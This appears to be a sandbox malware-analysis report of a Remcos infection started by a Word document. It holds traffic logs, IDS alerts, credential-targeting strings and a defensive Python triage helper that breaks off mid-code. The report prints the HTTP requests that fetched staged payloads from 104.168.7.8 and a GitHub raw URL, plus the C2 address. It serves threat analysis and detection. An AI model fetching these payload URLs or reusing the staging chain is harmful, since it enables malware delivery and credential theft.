                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169

                Networking

                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49172 -> 103.186.116.99:58934
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49173 -> 103.186.116.99:58934
                Source: Network traffic | Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 104.168.7.8:80 -> 192.168.2.22:49171
                Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 104.168.7.8:80 -> 192.168.2.22:49171
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49175 -> 103.186.116.99:58934
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49176 -> 103.186.116.99:58934
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49177 -> 103.186.116.99:58934
                Source: Malware configuration extractor | URLs: 103.186.116.99
                Source: global traffic | TCP traffic: 103.186.116.99 ports 58934,3,4,5,8,9
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 103.186.116.99:58934
                Source: global traffic | HTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1 | Host: raw.githubusercontent.com | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /510/RFGB.txt HTTP/1.1 | Host: 104.168.7.8 | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
                Source: Joe Sandbox View | IP Address: 178.237.33.50
                Source: Joe Sandbox View | IP Address: 185.199.111.133
                Source: Joe Sandbox View | IP Address: 103.186.116.99
                Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
                Source: Joe Sandbox View | ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
                Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49174 -> 178.237.33.50:80
                Source: global traffic | HTTP traffic detected: GET /9aubsm HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | Host: og1.in | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /510/RN/creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr.doc HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | Host: 104.168.7.8 | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /510/niceworkwithpcitureupdateson.tIF HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 104.168.7.8 | Connection: Keep-Alive
                Source: unknown | HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49162 version: TLS 1.0
                Source: unknown | HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49163 version: TLS 1.0
                Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.22:49170 version: TLS 1.0
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,13_2_0041B411
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5FD5A5F2-1D5C-4618-A34F-9D73F6355FD3}.tmpJump to behavior
                Source: global trafficHTTP traffic detected: GET /9aubsm HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: og1.inConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /510/RN/creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr.doc HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: 104.168.7.8
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /510/niceworkwithpcitureupdateson.tIF HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 104.168.7.8
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /510/RFGB.txt HTTP/1.1
    Host: 104.168.7.8
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /json.gp HTTP/1.1
    Host: geoplugin.net
    Cache-Control: no-cache
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
Source: RegAsm.exe, 00000011.00000002.420443541.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.420443541.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: RegAsm.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: RegAsm.exe, 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: RegAsm.exe, 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic | DNS traffic detected: DNS query: og1.in
Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
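The four requests above are the whole download chain on the wire: Office pulls the remote template with its own "ms-office" User-Agent, the Equation Editor fetches a ".tIF" that is not an image, PowerShell fetches RFGB.txt with no User-Agent at all, and the injected RegAsm.exe process asks geoplugin.net for the victim's geolocation. The following Python triage helper is an added example and is not Joe Sandbox code or anything from the sample: it parses requests in that raw form and applies those four checks, returning tags per URL plus the host and URL IOCs. The request text is re-typed from the report as constructed sample input; the tag names, the extension list and the "bare IP plus no Referer" heuristic are this example's own assumptions, not rules the report states.

```python
"""Triage of the HTTP requests a sandbox report lists under "HTTP traffic detected".

Added example, not Joe Sandbox code. SAMPLE_REQUESTS re-types the report's four
requests as constructed input; tag names and rule thresholds are assumptions.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

OFFICE_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; "
             ".NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
             "Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)")
IE_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; "
         ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; "
         ".NET4.0C; .NET4.0E)")
DOC_PATH = ("/510/RN/creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyas"
            "getbackgreatthingswithme____securethingsareinthr.doc")

# Constructed sample input: the report's four requests, CRLF-joined as they appear on the wire.
SAMPLE_REQUESTS = [
    f"GET {DOC_PATH} HTTP/1.1\r\nAccept: */*\r\nUser-Agent: {OFFICE_UA}\r\nUA-CPU: AMD64\r\n"
    "Accept-Encoding: gzip, deflate\r\nHost: 104.168.7.8\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /510/niceworkwithpcitureupdateson.tIF HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n"
    f"User-Agent: {IE_UA}\r\nHost: 104.168.7.8\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /510/RFGB.txt HTTP/1.1\r\nHost: 104.168.7.8\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /json.gp HTTP/1.1\r\nHost: geoplugin.net\r\nCache-Control: no-cache\r\n\r\n",
]

BARE_IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")
TEMPLATE_EXT = {".doc", ".dot", ".dotm", ".dotx", ".rtf"}
# Extensions the staging host serves to Office, EQNEDT32.EXE and PowerShell in the report;
# ".tIF" is fetched by the Equation Editor, so the image extension is cosmetic (assumption).
STAGED_EXT = {".doc", ".rtf", ".tif", ".txt", ".exe", ".dll"}


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: Dict[str, str]  # header names lower-cased

    @property
    def host(self) -> str:
        return self.headers.get("host", "")

    @property
    def url(self) -> str:
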